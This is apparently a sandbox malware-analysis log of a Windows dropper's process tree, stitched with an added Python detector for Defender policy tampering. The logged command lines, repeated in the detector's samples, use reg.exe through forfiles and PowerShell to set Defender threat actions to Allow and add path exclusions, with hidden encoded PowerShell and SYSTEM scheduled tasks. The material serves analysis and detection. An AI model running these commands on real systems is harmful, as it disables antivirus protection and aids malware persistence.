    cmd: schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 11:26:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exe\" GH /SvWcdidgG 385118 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
(level 2) C:\Windows\SysWOW64\schtasks.exe  PID 4620
    cmd: schtasks /run /I /tn "XyyyteIMwZeutaZuw"

(level 1) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  PID 5208
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
  (level 2) C:\Windows\System32\Conhost.exe  PID 5144
      cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  (level 2) C:\Windows\system32\gpupdate.exe  PID 6092
      cmd: "C:\Windows\system32\gpupdate.exe" /force

(level 1) \??\c:\windows\system32\gpscript.exe  PID 5920
    cmd: gpscript.exe /RefreshSystemParam
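Read end to end, the tree above records one defense-evasion routine. Install.exe runs forfiles.exe against files that already exist in System32 (where.exe, calc.exe, waitfor.exe, help.exe) purely as a proxy to spawn cmd.exe, which runs reg.exe to write HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\<threat ID> = 6 (Defender's action code for Allow) for a fixed list of threat IDs; it repeats the same writes in one PowerShell command line for both the /reg:32 and /reg:64 registry views, adds its drop directories as policy-defined Defender exclusions under Exclusions\Paths (REG_DWORD 0), and then runs gpupdate /force, once from the forfiles chain and once from a throw-away scheduled task ("gxTcKWwzR") whose -EncodedCommand is the base64 of the UTF-16LE string start-process -WindowStyle Hidden gpupdate.exe /force, so that the policy keys take effect. Note that in the PowerShell batches ';' is a PowerShell statement separator: only the first REG ADD goes through cmd.exe and the rest run as direct children of powershell.exe, which is why reg.exe appears under both parents. Detection should therefore key on the command line rather than on the parent process. The parser below is an added example, not part of this report or of the sample: it pulls every reg add out of a command line regardless of quoting and nesting, maps writes under the Defender policy key to the threat ID or exclusion path they touch, decodes -EncodedCommand, and flags the gpupdate /force that applies the change. The sample command lines are constructed, shortened copies of lines from the tree; the action-code table is Defender's own (Set-MpPreference -ThreatIDDefaultAction_Actions).

```python
"""Flag Windows Defender policy tampering in process command lines.

Added example (not from the sandbox report): detection logic a SOC would run
over Sysmon Event 1 / Security 4688 command lines. SAMPLE_CMDLINES are
constructed, modelled on the process tree in the report.
"""
import base64
import re

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
THREAT_ACTION_KEY = DEFENDER_POLICY + r"\Threats\ThreatIDDefaultAction"
EXCLUSION_KEY = DEFENDER_POLICY + r"\Exclusions\Paths"

# Defender default-action codes (Set-MpPreference -ThreatIDDefaultAction_Actions).
DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                    "8": "UserDefined", "9": "NoAction", "10": "Block"}

# `reg add "HKLM\..."` whether bare, via a quoted image path, or inside escaped quotes.
REG_ADD_RE = re.compile(r'reg(?:\.exe)?"?\s+add\s+"?(HK[A-Z_]+\\[^"]+?)"?(?=\s+/)', re.I)
REG_OPT_RE = re.compile(r'/(v|t|d)\s+(?:"([^"]*)"|(\S+))', re.I)
REG_VIEW_RE = re.compile(r"/reg:(32|64)", re.I)
# -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
GPUPDATE_RE = re.compile(r"gpupdate(?:\.exe)?\s+/force", re.I)


def parse_reg_adds(cmdline):
    """Return one dict per `reg add` found in a command line.

    cmd.exe chains commands with '&' and PowerShell with ';'. Backslash-escaped
    quotes are the outer quoting of a nested cmd/forfiles/powershell call and
    are collapsed first so the same regexes work at every nesting depth.
    """
    text = cmdline.replace('\\"', '"')
    adds = []
    for segment in re.split(r"[;&]", text):
        m = REG_ADD_RE.search(segment)
        if not m:
            continue
        opts = {}
        for name, quoted, bare in REG_OPT_RE.findall(segment[m.end():]):
            opts[name.lower()] = (quoted or bare).strip('"')
        view = REG_VIEW_RE.search(segment)
        adds.append({"key": m.group(1), "value": opts.get("v"), "type": opts.get("t"),
                     "data": opts.get("d"), "view": view.group(1) if view else "native"})
    return adds


def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline):
    """Return (finding, detail) pairs for one command line; empty list if benign."""
    findings = []
    for add in parse_reg_adds(cmdline):
        key = add["key"].lower()
        if key == THREAT_ACTION_KEY.lower():
            action = DEFENDER_ACTIONS.get(add["data"], "unknown(%s)" % add["data"])
            findings.append(("defender_threat_default_action",
                             "threat %s -> %s (view %s)" % (add["value"], action, add["view"])))
        elif key == EXCLUSION_KEY.lower():
            findings.append(("defender_exclusion_path", add["value"]))
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(("powershell_encoded_command", decoded))
    if GPUPDATE_RE.search(cmdline) or GPUPDATE_RE.search(decoded or ""):
        findings.append(("group_policy_refresh", "gpupdate /force"))
    return findings


def summarize(cmdlines):
    """Across a whole tree: threat IDs set to Allow and paths excluded, whoever ran reg.exe."""
    allowed, excluded = set(), set()
    for line in cmdlines:
        for add in parse_reg_adds(line):
            key = add["key"].lower()
            if key == THREAT_ACTION_KEY.lower() and add["data"] == "6":
                allowed.add(add["value"])
            elif key == EXCLUSION_KEY.lower():
                excluded.add(add["value"])
    return sorted(allowed), sorted(excluded)


def scan(cmdlines):
    """Pair each command line with its findings, dropping lines that have none."""
    return [(line, assess(line)) for line in cmdlines if assess(line)]


# Constructed sample lines, shortened from the process tree (quoting kept as logged).
SAMPLE_CMDLINES = [
    # forfiles used as a proxy launcher, plus the gpupdate that applies the policy
    r'"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"',
    # PowerShell batch: the first statement goes through cmd /C, the rest run reg.exe directly
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;"',
    # exclusion written by reg.exe as a direct child of powershell.exe
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64',
    # scheduled task carrying the encoded PowerShell command
    r'schtasks /CREATE /TN "gxTcKWwzR" /SC once /ST 01:00:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    # ordinary registry write, for contrast (hypothetical vendor key)
    r'reg add "HKCU\Software\ExampleVendor\ExampleApp" /v Theme /t REG_SZ /d dark /f',
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_CMDLINES):
        print(line[:70] + "...")
        for finding in findings:
            print("   ", *finding)
    print("allowed threat IDs / excluded paths:", summarize(SAMPLE_CMDLINES))
```

HKLM\SOFTWARE\Policies is shared between the 32- and 64-bit registry views, so the /reg:32 and /reg:64 pairs land on the same key; the view is still recorded so that each reg.exe child in the tree can be matched to its finding. On an affected host the same two policy keys are the ones to inspect and clear, since Defender honours them over the local preferences; the lists returned by summarize() are exactly the values to remove.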
(level 1) C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe  PID 5864
    cmd: C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(level 1) C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe  PID 5540
    cmd: C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
    - Executes dropped EXE

(level 1) C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe  PID 1392
    cmd: C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe it /yGTdiduRiv 385118 /S
    - Executes dropped EXE
  (level 2) C:\Windows\SysWOW64\cmd.exe  PID 5636
      cmd (wrapped at '&'): "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" &
          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" &
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" &
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" &
          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5568
        cmd: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5300
          cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 5292
            cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
    (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5264
        cmd: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5800
          cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 2884
            cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
    (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 4428
        cmd: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5948
          cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 6112
            cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
    (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 4192
        cmd: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      (level 4) C:\Windows\SysWOW64\cmd.exe  PID 4552
          cmd: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        (level 5) \??\c:\windows\SysWOW64\reg.exe  PID 5388
            cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
    (level 3) C:\Windows\SysWOW64\forfiles.exe  PID 5996
        cmd: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      (level 4) C:\Windows\SysWOW64\cmd.exe  PID 5960
          cmd: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        (level 5) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 5224
            cmd: powershell start-process -WindowStyle Hidden gpupdate.exe /force
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          (level 6) C:\Windows\SysWOW64\gpupdate.exe  PID 2056
              cmd: "C:\Windows\system32\gpupdate.exe" /force
  (level 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  PID 5376
      cmd (wrapped at ';'): powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;
          REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
    (level 3) C:\Windows\SysWOW64\cmd.exe  PID 5556
        cmd: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      (level 4) C:\Windows\SysWOW64\reg.exe  PID 2216
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 3044
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 3660
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 6112
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5948
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 4428
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 6000
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5940
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 2180
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 2868
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5620
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5404
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 4772
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 1076
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5480
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 4268
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 4340
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 436
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5576
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5636
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5584
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5632
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5592
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 2892
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5972
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 1100
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5936
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    (level 3) C:\Windows\SysWOW64\reg.exe  PID 5472
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3100)
  Command line: schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:05:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exe\" GH /yiqudidnn 385118 /S" /V1 /F
  Signatures:
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\System32\Conhost.exe (depth 3, PID 5324)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5432)
  Command line: schtasks /run /I /tn "XyyyteIMwZeutaZuw"

\??\c:\windows\system32\svchost.exe (depth 1, PID 3112)
  Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exe (depth 1, PID 5176)
  Command line: C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exe GH /SvWcdidgG 385118 /S
  Signatures:
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 5244)
  Command line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe (depth 3, PID 5000)
  Command line: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe (depth 4, PID 2344)
  Command line: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

